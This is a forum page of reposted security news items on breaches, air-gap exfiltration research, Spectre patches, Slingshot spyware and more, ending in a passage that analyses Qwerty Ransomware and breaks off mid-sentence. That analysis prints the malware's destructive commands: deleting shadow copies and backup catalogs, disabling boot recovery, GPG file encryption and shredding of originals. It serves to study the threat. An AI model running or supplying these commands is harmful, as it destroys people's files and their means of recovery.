Jump to content

Scorpion

Super Moderator
  • Content Count

    392
  • Joined

  • Last visited

  • Days Won

    13

Everything posted by Scorpion

  1. (Image: file photo)Yahoo customers affected by three massive data breaches that resulted in the theft of more than three billion users' data are allowed to sue the company, a judge has ruled. California judge Lucy Koh rejected a bid by Verizon, which bought the internet giant last year, to dismiss a large portion of the claims, including breach of contract, deceit and concealment, and negligence. At the heart of the case, Yahoo was accused of taking too long to notify users of the breaches, which put customers at risk of identity theft and fraud. The filing, dated Friday, cited several customers whose data was stolen by criminals and used for filing fraudulent tax returns or credit card charges. Other customers had to pay out to credit bureaus to freeze their accounts. Koh said that customers may have "taken measures to protect themselves" had they known about the breaches sooner. The case began in 2016 after the company admitted it was hacked in 2014, in which 500 million user accounts were stolen. Later in the year, the company revealed that it was hacked again -- a year earlier in 2013 -- in which one billion accounts were stolen. Yahoo later said that all its three billion users were affected by that breach. A separate attack on the company's systems allowed hackers to steal portions of the company's source code. Attackers used that code to generate cookies, allowing access to accounts without requiring a user's password. Verizon did not immediately respond to a request for comment.
  2. A well-established research team from the Ben-Gurion University of the Negev in Israel has detailed today a new method of extracting data from air-gapped computers using speakers, headphones, earphones, or earbuds. The attack is only experimental at this point, has not been seen in the real world, but has been proven to work and researchers have also created a custom protocol for transmitting data between two computers* —one air-gapped and one Internet-connected that can relay the data further. Attack scenarios include speaker-to-speaker exfiltration, speaker-to-headphones, and headphones-to-headphones. Jack retasking strikes again! The attack —nicknamed MOSQUITO— is possible because of a technique called "jack retasking" that reverses output audio jacks to input jacks, effectively turning speakers into (unconventional) microphones. The same research team explored jack retasking in a previous research project last year, called Speake(a)r, which researchers used to turn headphones into microphones and record nearby audio and conversations. For the current experiment, researchers argue that malware that managed to infect an air-gapped computer can transform and modulate locally stored files into audio signals and relay them to another nearby computer via connected speakers, headphones, earphones, or earbuds. The receiving computer, also infected with malware, uses jack retasking to convert connected speakers, headphones, earphones, or earbuds into a makeshift microphone, receive the modulated audio, and convert back into a data file. MOSQUITO attack supports pretty fast transfer speeds Researchers created a custom data protocol that modulates binary data into audio signals, and they tested their attack for distances between 1 and 9 meters (3.2 to 29.5 feet). Researchers said they managed to transfer data between two computers with speeds varying from 1800 bits/s and 1200 bits/s for speakers facing each other and emitting sound in audible frequency bands (lower than 18kHz). Transfer speeds decreased if the speakers weren't facing each other, the distance between speakers increased, or audio frequency changed (towards low or high frequency). While the first two factors are self-explanatory, the last needs an additional explanation. "The reason for that is that loudspeakers, and particularly home grade PC loudspeakers, were projected and optimized for human auditory characteristics, and therefore they are more responsive to the audible frequency ranges," said researchers. Transfer speeds also decreased when using earphones or earbuds (varied between 600 bits/s and 300 bits/s) and went even lower for headphones (around 250 bits/s). The reason was that headphones directed their sound waves in one particular direction, limiting efficient exfiltration cases to very small distances when headphones were close to each other, and when they emitted sound in audible frequencies only. Other factors that decreased data transfer speeds included environment noise such as music and speech, but researchers said this could be mitigated by moving the data exfiltration frequency above 18kHz. The research team discusses various mitigation and countermeasures in their research paper entitled "MOSQUITO: Covert Ultrasonic Transmissions between Two Air-Gapped Computers using Speaker-to-SpeakerCommunication." They also released the following demos to showcase their work. [embedded content] [embedded content] The research center from the Ben-Gurion University of the Negev who came up with this new data exfiltration technique has a long history of innovative and sometimes weird hacks, all listed below: LED-it-Go - exfiltrate data from air-gapped systems via an HDD's activity LED SPEAKE(a)R - use headphones to record audio and spy on nearby users 9-1-1 DDoS - launch DDoS attacks that can cripple a US state's 911 emergency systems USBee - make a USB connector's data bus give out electromagnetic emissions that can be used to exfiltrate data AirHopper - use the local GPU card to emit electromagnetic signals to a nearby mobile phone, also used to steal data Fansmitter - steal data from air-gapped PCs using sounds emanated by a computer's GPU fan DiskFiltration - use controlled read/write HDD operations to steal data via sound waves BitWhisper - exfiltrate data from non-networked computers using heat emanations Unnamed attack - uses flatbed scanners to relay commands to malware infested PCs or to exfiltrate data from compromised systems xLED - use router or switch LEDs to exfiltrate data Shattered Trust - using backdoored replacement parts to take over smartphones aIR-Jumper - use security camera infrared capabilities to steal data from air-gapped networks HVACKer - use HVAC systems to control malware on air-gapped systems MAGNETO & ODINI - steal data from Faraday cage-protected systems
  3. Image: Besjunior, Getty Images/iStockphotoAs Oscar Wilde might have put it: "To lose one filing cabinet full of government documents may be regarded as a misfortune; to lose two looks like carelessness."Carelessness is something the Australian government seems to be quite good at these days. News broke on Sunday that in 2013, confidential personnel files from the then Department of Families, Housing, Community Services and Indigenous Affairs (FaHCSIA), now part of the Department of Social Services, had gone walkies for several days. Just like the secret cabinet files incident reported in January, these documents were discovered in a locked filing cabinet bought from a second-hand furniture store. "The documents were personnel files which had all the personal details [of employees] like home addresses and phone numbers, as well as previous positions held, CVs, and security clearances," the buyer told The Sunday Canberra Times. "It was a two-drawer filing cabinet, and the bottom drawer was completely full," he said. The two incidents aren't quite the same. Personnel files don't have to be handled under the same security protocols as cabinet documents. But there's plenty enough information in them to make identity theft or spearphishing a trivial pursuit. Yes, this is carelessness. Then there was the incident where a "classified notebook belonging to a top Defence official" was discovered, along with his ID ... guess where? "Initial inquiries indicate the items were inadvertently left in a piece of personal furniture recently disposed of by the Defence official," The Canberra Times reported. Three incidents involving lost documents in second-hand furniture doesn't constitute a wave of incompetence, of course, no more than two or three robberies random clustered together constitute a crime wave. But these physical data leaks are being unearthed at a time when confidence in the government's ability to manage data needs to be questioned, and questioned hard. Do we need to repeat the now-familiar litany? The government's recklessness with medical data. The omnishambles of the 2016 Census. The collapse of the Australian Taxation Office (ATO) storage system. The unthinking viciousness of Centrelink's robodebt debacle. Things are no better at the state level -- the corruption of Victoria's Ultranet project and NSW agencies struggling with the security basics, to name but two examples. Do you detect a pattern? I do. So do former senior public servants, but in another way. Last month, The Mandarin, a news site that covers leadership in the public sector, concluded that there's an urgent need to recover the capacity for deep policy analysis in the Australian Public Service (APS). Terry Moran, a former secretary of the Department of the Prime Minister and Cabinet (PM&C), was scathing. "The APS is failing in areas of social policy because it has been stripped of specialist capability and service delivery experience. If it were a patient it would be in palliative care," Moran said. "Successive governments haven't nurtured the APS: they've gutted it." David Borthwick, former secretary of the Department of Environment, Water, Heritage and the Arts, was concerned that a lack of resources meant that departments were flat out delivering their programs, with little time for anything else. "The quality of the Australian Public Service is the foundation of good government. It must have the capacity -- the skilled workforce and the resources -- to undertake the strategic thinking which underpins longer-term reforms," Borthwick said. Highly-respected journalist Laura Tingle reported similar concerns in her Quarterly Essay from 2015, Political Amnesia: how we forgot how to govern. "The blurring of boundaries between the public servant and the political adviser, and the relentless focus on message over substance, results in a diminution of the 'space' in which the independent adviser can operate," Martin Parkinson, currently secretary of the Department of Prime Minister and Cabinet, said at the time. "Today, in some institutions, smart people look around at their colleagues and find there is no one to talk to, to learn from, who has experience in delivering real reform." Ken Henry, a former secretary of the Commonwealth Treasury, said much the same thing in Tingle's essay. "I think many departments have lost the capacity to develop policy; but not just that, they have lost their memory. I seriously doubt there is any serious policy development going on in most government departments," Henry said. All this is about developing policy rather than implementing programs, of course. But aren't they the exact two things that the government is actually for? If Australia were struggling to do either one of them, then we'd be deep in the brown stuff. But we're struggling with both. The most worrying comment for me came from Peter Varghese, a former secretary of the Department of Foreign Affairs and Trade (DFAT). "Deep policy thinking is an area where our system, at both the political and the public service levels, has struggled over the last decade," The Mandarin quoted Varghese as saying. "Recovering the capacity for deep policy analysis is urgent because we are at an inflection point in our history. It is not dissimilar to the period after the second world war when the nation had to set out in a new direction and when the political and public service leaderships worked so well together to chart that direction. Or the period from the early eighties when we set out to internationalise the Australian economy; or the nineties when tax and industrial relations policies had to be redefined." Yes, the Australian government is struggling, both with policy development and with the implementation of data-enabled programs, at the exact moment in history when such things are needed. The government is even having to hire consultants to teach it how to do basic government stuff like organisational development. Parliament is currently running an inquiry into how the government uses contractors, with wide-ranging terms of reference. Stay tuned, but remember that this inquiry will only scratch the surface. Related Coverage Canberra seeks vendor fluent in digital transformation to modernise public service The Australian Public Service Commission is looking for a vendor to train public service staff so they can lead digital transformation within their respective agencies or departments. Australian Home Affairs thinks its IT is safe because it has a cybermoat For a department that is focused on protecting borders, it seems virtual border protection is missing in action. Cisco: Update now to fix critical hardcoded password bug, remote code execution flaw Cisco patches two serious authentication bugs and a Java deserialization flaw. UK government lays out new guidelines for IoT device security (TechRepublic) In its Secure by Design report, the UK government aims to address the risk of consumer privacy being undermined by the Internet of Things. Microsoft forces Windows 10 update on PCs that were set up to block it (TechRepublic) Some users reported being pushed to the Win10 1709 upgrade with no advanced warning.
  4. A Canadian businessman has been arrested in the US for allegedly modifying and encrypting BlackBerry smartphones used by "upper echelon" Australian criminals, Mexican drug cartel members, and other members of the global underworld.Vincent Ramos, 41, the chief executive of Vancouver-based Phantom Secure, was taken into custody in California last week after a global investigation involving the Australian Federal Police and the seizure of shipments of cocaine from the US to Australia. Phantom Secure technicians gutted BlackBerry handsets of their original hardware and software and installed new encryption software and an email program, according to a criminal complaint filed in the US District Court. Of the 20,000 Phantom Secure devices in service around the world, 10,000 were allegedly in Australia, according to estimates touted by the FBI. "According to law enforcement sources in Australia, Canada, and the US, Phantom Secure devices are used by the upper echelon members of various transnational criminal organisations to communicate with their criminal compatriots and conduct the illegal activities of the organisation," FBI Special Agent Nicholas Cheviron wrote in the complaint. Phantom Secure allegedly charged customers between $2,000 and $3,000 for six-month subscriptions and were "specifically designed to prevent law enforcement from intercepting and monitoring communication". The phones' emails were allegedly routed through encrypted servers in Panama and Hong Kong, nations Phantom Secure claimed in marketing materials were "uncooperative" with law enforcement. A transnational drug trafficker and associate of Mexico's infamous Sinaloa cartel, known in court documents as Cooperating Witness One (CW-1), told authorities cartel members used Phantom Secure phones. "CW-1 stated that over the course of several years, his drug trafficking organisation moved hundreds of kilograms of cocaine per month from Mexico through the US, ultimately destined for Canada and Australia," the FBI special agent wrote. "CW-1 used a Phantom Secure device to co-ordinate and complete each of these drug transactions." In August 2015, using Phantom Secure devices, "CW-1 and his Australian conspirators co-ordinated a shipment of 10kg of cocaine from the US to Australia, which was seized by the Australian Border Force," according to court documents. In 2016 Australian Federal Police seized a Phantom Secure device from an Australian arrested for drug smuggling, according to the FBI. "During this period, the AFP communicated with an unknown individual in Los Angeles who packaged and shipped 16 kilograms of cocaine to Australia where it was intercepted on September 11, 2016," the FBI special agent wrote. Ramos faces racketeering conspiracy, conspiracy to distribute narcotics charges, and aiding and abetting charges. The arrest of the head of an organisation helping criminals avoid legal surveillance will, more than likely, be used by those seeking a decryption magic bullet. Last month, Australian Minister for Home Affairs Peter Dutton labelled "ubiquitous encryption" a "significant obstacle" to terrorism investigations. According to the minister, more than 90 percent of counter-terrorism targets are using encryption for communications, including for attack planning in Australia. "Decryption takes time, a precious commodity when threats may materialise in a matter of days or even hours," Dutton said at the time. "Law enforcement access to encrypted communications should be on the same basis as telephone and other intercepts, in which companies provide vital and willing assistance in response to court orders." Speaking at a recent Senate Estimates hearing, Secretary of the Department of Home Affairs Michael Pezzullo said the government's decryption solultion, when details on it are unveiled, would not "undermine legitimate encryption" and would balance societal needs for encryption. "The challenge for governments and parliaments all around the world is how do you ensure that encryption is used for legitimate societal purposes, and not misused by -- in the same way the internet is misused through the dark web -- that encryption is available to those who use it for legitimate purposes and not otherwise," Pezzullo said last month. The secretary for Home Affairs struck out at descriptions of the decryption proposal as a "backdoor". "That's the shorthand, colloquial, and in many respects, highly ill-informed shorthand that is sometimes used in this field," he said. "You assume that a backdoor has to be created, I'm just saying that that is a cartoon-like assumption -- not that you are making -- but you've seen the literature." Later in the hearing, the department said the national facial recognition system it is developing was protected due to its "hub-and-spoke" topology, and a unique characteristic of its network. "We've also got a moat on the outside of the gateway, don't we?" Pezzullo said to Department Deputy Secretary of Intelligence and Capability Maria Fernandez. After Fernandez replied in the affirmative, Pezzullo said the system also has a number of "forward posts ahead of the moat". Details on the department's cybermoat have yet to be fleshed out. In November, Ben Flatgard, director for Cybersecurity Policy on the US National Security Council during the Obama administration, told ZDNet that Australia's push for decryption was reckless policy. "We've been discussing this as long as encryption's been used in commercial applications," Flatgard said. In January, a US senator said the approach to encryption by FBI director Christopher Wray was an ill-informed policy proposal. For years, these experts have repeatedly stated that what you are asking for is not, in fact, possible," said Democrat Senator Ron Wyden in a letter. Wray had previously stated that an inability to access encrypted devices was an urgent public safety issue, and the agency was not able to access evidence, despite lawfully being able to.
  5. Just two botnets accounted for 97% of all spam emails in the last three months of 2017, according to a McAfee report released earlier today. For most of these months, Necurs has spent its time churning out "lonely girl" spam lures for adult websites, pump-and-dump schemes [1, 2], and delivering ransomware payloads. Overall, nearly two out of three spam emails sent in the last quarter of 2018 were sent from the infrastructure of this mammoth botnet. Second on the list was the Gamut botnet, also built on Windows machines infected with malware that hijacks systems to send out spam. Gamut —while smaller in size when compared to Necurs— had previously been more active in Q3, sending more spam than the aforementioned. In Q4, Gamut activity went down, but the botnet still accounted for 37% of all email spam, compared to Necurs' 60%. Most of Gamut's email subjects were related to job offer–themed phishing and money mule recruitment (tricking people to buy products with stolen money and sending the products to crooks; relaying money from hijacked bank accounts to crooks' accounts). Ransomware statistics for Q4 2017 But the report, which takes an eagle-eye view of the malware scene in Q4 2017, also shines a light on the ransomware scene. McAfee says that the numbers of both desktop and mobile ransomware were up in late 2017, by 35% in Q4 and by 59% for the year. On the desktop side, the security firm says that a big contributor to the growth of ransomware detections was the Ransom:Win32/Genasom family, a generic term that has been used for CryptoMix variants. On the mobile scene, the number of new mobile ransomware families went down, but the number of infections continued to grow. But this part of the McAfee report is questionable, as another similar report from ESET said that mobile ransomware went down, not up, in 2017. Other malware statistics for Q4 2017 As for other malware trends, the McAfee Labs Threats Report for Q4 2018 contains the following findings: ?* The number of new malware strains grew by 35% ?* The total number of malware detections grew by 35% ?* Waboot malware was the most detected threat of Q4 2017 ?* Mac malware grew by 24% in Q4 and 243% for the year ?* Flashback (infostealer) and Longage (RAT) were the most prevalent Mac threats in Q4 2017 ?* JavaScript-based malware grew by 9% ?* PowerShell malware more than tripled, growing by 267% ?* Macro malware increased by 53% in Q4, declined by 35% in 2017 ?* Faceliker malware continued to grow after initial detection
  6. Meltdown-Spectre Intel has almost wrapped up revised microcode updates that address unexpected reboots caused by its first attempt at mitigating the Spectre variant 2 attack. The chip-maker's recently updated microcode revision guidance indicates that most of its platforms from the past decade now have production-ready patches to mitigate the Spectre attack. On January 22, three weeks after releasing microcode updates to address the speculative execution side-channel vulnerabilities, Intel advised PC makers to halt the deployment of its Spectre patches due to unexpected system reboots and in some instances data loss. Over the past month Intel has released revised updates for Skylake, Kaby Lake, Coffee Lake chips and, at the end of February, released fixed production updates for Broadwell and Haswell chips. As of Thursday, Intel has moved beta updates for Sandy Bridge and Ivy Bridge processors to production. These include Xeon and Core processors for the two families. It also released revised production updates for Haswell Server EX Xeon, Haswell ULT, and Broadwell Server EX Xeon CPUs. The revised microcode updates are delivered to end-users as firmware updates from PC and server manufacturers. Dell has now released new BIOS updates with Intel's revised microcode for datacenter servers and PowerEdge Server 14G, 13G, and 12G generation servers, with 11G updates still in process. Dell has also released revised BIOS updates available for most of its client devices across XPS, Vostro, Venue, Precision, OptiPlex, Latitude, Inspiron, and Alienware brands. HP's support page indicates that most of its commercial and consumer laptops, desktops and tablets have fixed softpaq updates available for download. Lenovo meanwhile expects to update ThinkCenter, ThinkPad, ThinkStation, and Yoga by the end of March. Updates for affected Lenovo enterprise systems are also targeted for delivery throughout March. Admins managing large Windows deployments can use Microsoft's recently released Spectre and Meltdown patch assessment tool to check the status of devices on their networks. Previous and related coverage New Spectre attack variant can pry secrets from Intel's SGX protected enclaves Sensitive data protected by Intel's Software Guard Extensions could be open to a new side-channel attack. Intel's Spectre fix for Broadwell and Haswell chips has finally landed Chips that sparked Intel's recall of microcode for Spectre Variant 2 attack now have stable fixes. First Intel, now AMD also faces multiple class-action suits over Spectre attacks Customers accuse the chip maker of charging premium prices for a faulty product. Intel's new Spectre fix: Skylake, Kaby Lake, Coffee Lake chips get stable microcode Intel makes progress on reissuing stable microcode updates against the Spectre attack. Meltdown-Spectre: Now the class action suits against Intel are starting to mount up Intel faces 32 class action lawsuits over its processor flaws and says more may be in the pipeline. Meltdown-Spectre flaws: We've found new attack variants, say researchers Intel and AMD may need to revisit their microcode fixes for Meltdown and Spectre. Linux Meltdown patch: 'Up to 800 percent CPU overhead', Netflix tests show The performance impact of Meltdown patches makes it essential to move systems to Linux 4.14. Spectre reboot problems: Now Intel replaces its buggy fix for Skylake PCs And offers patching tips from US CERT, which it failed to brief on the bugs. Meltdown-Spectre: Malware is already being tested by attackers Malware makers are experimenting with malware that exploits the Spectre and Meltdown CPU bugs. Windows emergency patch: Microsoft's new update kills off Intel's Spectre fix The out-of-band update disabled Intel's mitigation for the Spectre Variant 2 attack, which Microsoft says can cause data loss on top of unexpected reboots. Meltdown-Spectre: Why were flaws kept secret from industry, demand lawmakers Great work on patching your own products, but why were smaller tech companies kept in the dark? Spectre flaw: Dell and HP pull Intel's buggy patch, new BIOS updates coming Dell and HP have pulled Intel's firmware patches for the Spectre attack. Windows 10 Meltdown-Spectre patch: New updates bring fix for unbootable AMD PCs AMD PCs can now install Microsoft's Windows update with fixes for Meltdown and Spectre and the bug that caused boot problems. Meltdown-Spectre: Intel says newer chips also hit by unwanted reboots after patch Intel's firmware fix for Spectre is also causing higher reboots on Kaby Lake and Skylake CPUs. 26% of organizations haven't yet received Windows Meltdown and Spectre patches Tech Republic Roughly a week after the update was released, many machines still lack the fix for the critical CPU vulnerabilities. Bad news: A Spectre-like flaw will probably happen again CNET Our devices may never truly be secure, says the CEO of the company that designs the heart of most mobile chips.
  7. A sharp rise in cyber attacks targeting hospitals has been assisted by a failure by healthcare to address known vulnerabilities or comply with best security practices, with password sharing, outdated software and exposed servers rife within the sector.This lax approach to cyber security means that many cyber attackers and hackers are happy to take advantage of what they view as an easy target in order to get their hands on sensitive information - including medical records and other sensitive personal data. According to figures in the McAfee Labs Threats Report for March 2018, 2017 saw a 211 percent increase in disclosed security incidents in the healthcare compared with 2016. According to researchers at the security company, many of these incidents were "caused by failures to comply with security best practices or to address vulnerabilities in medical software". That compares to a rise in reported cyber attacks against educational establishments of 125 percent and a jump of around 15 percent in reported incidents against the financial and public sectors. While some cyber attackers view targeting hospitals as a step too far when it comes to conducting campaigns, for others they're lucrative hubs of valuable data just waiting to be exploited. During the course of the research, researchers found exposed healthcare data, sensitive images and vulnerable software, resulting in the ability to reconstruct patient body parts with the use of 3D printing. Typical security holes in healthcare organisations include hardcoded, embedded passwords, remote code execution, unsigned firmware or failures to address known vulnerabilities in medical software. Default accounts, cross-site scripting and vulnerabilities in web servers were also found to be issues, with many systems found to be running on old software. Arguably, the most significant example of failure to apply security patches resulting in hospitals falling victim to cyber attacks came with last years' WannaCry ransomware outbreak. While no patient data was compromised as a result of this global cyber attack, a large number of National Health Service hospitals and doctor's surgeries in the UK were forced offline as systems become infected. Later analysis of the incident found that basic patching could have prevented WannaCry from having such a massive impact. But with the rise in attacks against healthcare, combined with the sensitive personal data they hold, and how a cyber attack against a hospital could result in harm to patients, means organisations in the sector - and those which provide technology to them - must take more care when it comes to cyber security. "Both healthcare organisations and developers creating software for their use must be more vigilant in ensuring they are up to date on security best practices," said Christiaan Beek, McAfee lead scientist and senior principal engineer.
  8. Asia-Pacific had to deal with the highest number of malicious mobile apps last year and also was the region most affected across multiple categories, including ransomware and online banking malware.Some 3.3 million malicious mobile apps were detected in the region--five times more than EMEA, which was the next most effected region with 617,290 identified malicious apps. Asia-Pacific also clocked the highest number of threats in ransomware, accounting for 40 percent of the global figure, according to Trend Micro's 2017 annual security roundup report. In addition, the region saw the highest number of exploit kit attacks, at 70 percent, and had the highest number of PCs infected by online banking malware, at 55 percent. Last year, 553 data breaches were reported publicly, compared to 813 in 2016, noted Trend Micro's Asia, Middle East, and Africa managing director, Dhanya Thakkar. However, the number of affected records hit almost 5 billion, compared to 3.3 billion in 2016. "Ransomware threats and exploit kits also decreased in 2017, signalling a shift away from spray-and-pray attacks, and towards smaller-scale, more effective, and more targeted attacks," Thakkar said. Globally, there were 1.7 billion ransomware over the last two years, resulting in an estimated loss of US$5 billion. Asia-Pacific was hit by almost 40 percent of such attacks. Some 630 million threats were detected in 2017 alone, down from 1.07 billion the year before. Trend Micro also pointed to "soaring rates" of cryptocurrency mining malware, which exceeded 100,000 in October last year. More than 45.6 million cryptocurrency mining activities were identified across the year, accounting for a large proportion of events detected on Internet of Things (IoT) devices. The number of Business Email Compromise attempts also doubled between the first and second half of the year. Singapore issues cautionary note on mobile banking Meanwhile, Singapore's banking regulator and cybersecurity government agency issued a joint statement advising consumers to exercise caution when conducting mobile banking transactions. "Cybercriminals are targeting mobile banking users to phish for their personal data, login credentials to online services, and credit card information. These threats come in different forms, such as the installation of malware on mobile devices, the sniffing of data over unsecured Wi-Fi networks, or phishing scams masquerading as official correspondence from financial institutions," they said. The statement listed recommended steps consumers should take when banking on their mobile devices, which included accessing only trusted sources, avoiding unsecured Wi-Fi networks when banking online, and enabling two-factor authentication.
  9. Researchers at Kaspersky Lab have discovered espionage malware that appears to have been developed by a government to spy on targets across Africa and the Middle East for the past six years. The researchers haven't named Slingshot's country of origin but note the presence of debug messages written in perfect English, while various component names such as Gollum and Smeagol suggest the authors are fans of The Hobbit. Slingshot reached targets from a compromised software update for routers made by Latvian firm MikroTik. Its router management software, Winbox, downloads DLLs from the router's file system and loads them directly into a computer's memory -- an intended feature that Slingshot's developers exploited by adding a malicious library called ipv4.dll, which downloads the espionage tools. The two tools, Cahnadr and GollumApp, work in tandem to gather information and hide data collection and exfiltration from the target. Kaspersky researchers found it can capture screenshots, keyboard data, network data, passwords, USB connections, other desktop activity, and clipboard data. The researchers haven't discovered how Slingshot infects MikroTik routers to use the WinBox bridge to the PC, however they note in a technical paper that WikiLeaks' Vault 7 leak of CIA hacking tools did reference an exploit for MikroTik's router OS called ChimayRed. According to MikroTik, latest versions of WinBox no longer download the ipv4.dll file from the router, closing the attack vector. The malware appears to have been narrowly used with Kaspersky counting just 100 detections among its users between 2012 and February 2018. Over half the compromised computers were in Kenya and Yemen, with the remainder in Libya, Afghanistan, Iraq, Tanzania, Greece, Jordan, Mauritius, Somalia, Tunisia, Turkey, and United Arab Emirates. Slingshot hasn't been observed using previously undisclosed flaws but it did use three known vulnerabilities affecting non-Microsoft Windows utilities to load a kernel-mode component of Cahnadr. According to Kaspersky's FAQ on Slingshot, the GollumApp module features nearly 1,500 functions. "To run its code in kernel mode in the most recent versions of operating systems, that have Driver Signature Enforcement, Slingshot loads signed vulnerable drivers and runs its own code through their vulnerabilities. "Following infection, Slingshot would load a number of modules onto the victim device, including two huge and powerful ones: Cahnadr, the kernel mode module, and GollumApp, a user mode module. The two modules are connected and able to support each other in information gathering, persistence and data exfiltration. "The most sophisticated module is GollumApp. This contains nearly 1,500 user-code functions and provides most of the above described routines for persistence, file system control and C&C communications." Kaspersky advised anyone who uses MikroTik routers to update to its latest software release. Also, the company says MikroTik's Winbox software no longer allows downloading files from the router to the computer. Previous and related coverage Microsoft: Windows Defender can now spot FinFisher government spyware Microsoft dismantles government-grade malware to improve Windows and Office 365 defenses. UK government websites, ICO hijacked by cryptocurrency mining malware US and Australian government domains were also affected by the bold cryptojacking scheme. Kaspersky hauling Homeland Security to court to overturn federal ban The Russian security firm claims it did not receive due process and the US government relied on.
  10. Video: Microsoft fends off mining malware attackResearchers at Kaspersky Lab have discovered espionage malware that appears to have been developed by a government to spy on targets across Africa and the Middle East for the past six years. The researchers haven't named Slingshot's country of origin but note the presence of debug messages written in perfect English, while various component names such as Gollum and Smeagol suggest the authors are fans of The Hobbit. Slingshot reached targets from a compromised software update for routers made by Latvian firm MikroTik. Its router management software, Winbox, downloads DLLs from the router's file system and loads them directly into a computer's memory -- an intended feature that Slingshot's developers exploited by adding a malicious library called ipv4.dll, which downloads the espionage tools. The two tools, Cahnadr and GollumApp, work in tandem to gather information and hide data collection and exfiltration from the target. Kaspersky researchers found it can capture screenshots, keyboard data, network data, passwords, USB connections, other desktop activity, and clipboard data. The researchers haven't discovered how Slingshot infects MikroTik routers to use the WinBox bridge to the PC, however they note in a technical paper that WikiLeaks' Vault 7 leak of CIA hacking tools did reference an exploit for MikroTik's router OS called ChimayRed. According to MikroTik, latest versions of WinBox no longer download the ipv4.dll file from the router, closing the attack vector. The malware appears to have been narrowly used with Kaspersky counting just 100 detections among its users between 2012 and February 2018. Over half the compromised computers were in Kenya and Yemen, with the remainder in Libya, Afghanistan, Iraq, Tanzania, Greece, Jordan, Mauritius, Somalia, Tunisia, Turkey, and United Arab Emirates. Slingshot hasn't been observed using previously undisclosed flaws but it did use three known vulnerabilities affecting non-Microsoft Windows utilities to load a kernel-mode component of Cahnadr. According to Kaspersky's FAQ on Slingshot, the GollumApp module features nearly 1,500 functions. "To run its code in kernel mode in the most recent versions of operating systems, that have Driver Signature Enforcement, Slingshot loads signed vulnerable drivers and runs its own code through their vulnerabilities. "Following infection, Slingshot would load a number of modules onto the victim device, including two huge and powerful ones: Cahnadr, the kernel mode module, and GollumApp, a user mode module. The two modules are connected and able to support each other in information gathering, persistence and data exfiltration. "The most sophisticated module is GollumApp. This contains nearly 1,500 user-code functions and provides most of the above described routines for persistence, file system control and C&C communications." Kaspersky advised anyone who uses MikroTik routers to update to its latest software release. Also, the company says MikroTik's Winbox software no longer allows downloading files from the router to the computer. Previous and related coverage Microsoft: Windows Defender can now spot FinFisher government spyware Microsoft dismantles government-grade malware to improve Windows and Office 365 defenses. UK government websites, ICO hijacked by cryptocurrency mining malware US and Australian government domains were also affected by the bold cryptojacking scheme. Kaspersky hauling Homeland Security to court to overturn federal ban The Russian security firm claims it did not receive due process and the US government relied on.
  11. Stating with Firefox 60 —expected to be released in May 2018— websites won't be able to use Firefox to access data from sensors that provide proximity distances and ambient light information. Firefox was allowing websites to access this data via the W3C Proximity and Ambient Light APIs. But at the start of the month, Mozilla engineers have decided to disable access to these two APIs by default. The APIs won't be removed, but their status is now controlled by two Firefox flags that will ship disabled by default. This means users will have to manually enable the two flags before any website can use Firefox to extract proximity and ambient light data from the device's underlying sensors. A total of five new flags added The two flags will be available in Firefox's about:config settings page. The screenshot below shows the latest Firefox Nightly version, where the two flags are now disabled, while other sensor APIs are enabled. device.sensors.proximity.enabled device.sensors.ambientLight.enabled The Firefox code commit in which these two flags have been added also includes three other flags —to enable or disable all sensors APIs, to enable/disable the Device Orientation Sensor API, and to enable/disable the Motion Sensor API. device.sensors.enabled device.sensors.orientation.enabled device.sensors.motion.enabled These three flags will ship enabled by default, as access to these two APIs is needed by a broad range of a wide range of mobile websites. Privacy concerns over the Proximity and Ambient Light APIs The Proximity and Ambient Light sensors are both new and highly controversial. A key factor in the decision to ship these two APIs disabled by default is the work of privacy expert Lukasz Olejnik. Olejnik published two research reports on the possible ways attackers and advertisers could abuse these two APIs. For example, Olejnik argued that the W3C Proximity Sensor API could allow websites and advertisers to query the position of nearby objects in relation to a user's smartphone or tablet. Additionally, he also argued that malicious sites could use the W3C Ambient Light Sensor API to steal browser data. Shipping these two APIs off by default takes care of some of Olejnik's concerns, albeit it does not mitigate the risk altogether. "More user control is always good," Olejnik said regarding Mozilla's decision.
  12. A new ransomware has been discovered that utilizes the legitimate GnuPG, or GPG, encryption program*to encrypt a victim's files.* Currently in the wild, this ransomware is called Qwerty Ransomware and will encrypt a victims files, overwrite the originals, and the append the .qwerty extension to an encrypted file's name.It goes without saying, that GnuPG is a legitimate programs being illegally used by the Qwerty Ransomware developers. While a ransomware*using GnuPG to encrypt files is not unique as it has been done in the past with VaultCrypt and KeyBTC, it is not something that is commonly seen. While it is not known for sure how this ransomware is being distributed, it appears likely that it is manually installed by the attacker when they hack into computer running Remote Desktop Services.* First discovered by MalwareHunterTeam, we did not have the full package in order to fully analyze it. This week MalwareHunterTeam was able to find the complete package hosted on a site so that we could analyze it further. How the Qwerty Ransomware encrypts a computer The Qwerty Ransomware consists of a package of individual files that are run together to encrypt a computer. This package consists of the GnuPG*gpg.exe*executable, the*gnuwin32*shred.exe file, a batch file that loads the keys and launches a JS file, and a JS file that is used to launch the find.exe program. Qwerty Ransomware Package The first file to be launched is the key.bat file. This file acts as the main launcher for the ransomware by executing various commands sequentially. Batch File When the batch file is executed, the keys will be imported as shown below. Importing Keys After the keys are imported, the batch file will launch run.js. This file will execute the find.exe program, which is the main ransomware component. When executing find.exe, it will specify a particular drive letter that it tries to encrypt. JavaScript File When find.exe is executed it will launch the following commands on the victim's computer. taskkill /F /IM sql /T taskkill /F /IM chrome.exe /T taskkill /F /IM ie.exe /T taskkill /F /IM firefox.exe /T taskkill /F /IM opera.exe /T taskkill /F /IM safari.exe /T taskkill /F /IM taskmgr.exe /T taskkill /F /IM 1c /T vssadmin.exe delete shadows /all /quiet wmic shadowcopy delete bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe bcdedit /set {default} recoveryenabled no wbadmin.exe wbadmin delete catalog -quiet del /Q /F /S %s$recycle.bin It will then begin to encrypt each drive on the computer by executing the following command when it encrypts a file: gpg.exe --recipient qwerty -o "%s%s.%d.qwerty" --encrypt "%s%s" This command will encrypt the file using the imported public key and then save it as a new file under the same name, but now with the*.qwerty extension appended to it. For example, test.jpg would be encrypted and saved as test.jpg.qwerty. Encrypted Qwerty Files When encrypting files, it will encrypt any file that does not contain the following strings: Recycle temp Temp TEMP windows Windows WINDOWS Program Files PROGRAM FILES ProgramData gnupg .qwerty README_DECRYPT.txt .exe .dll After it encrypts a file it will run the shred.exe file on the original file in order to overwrite it. shred -f -u -n 1 "%s%s" It should be noted that it only overwrites files once, so they may be recoverable with file recovery software. The use of only one wipe is a tradeoff between speed and securely deleting the file. In each folder that a file is encrypted, it will create a 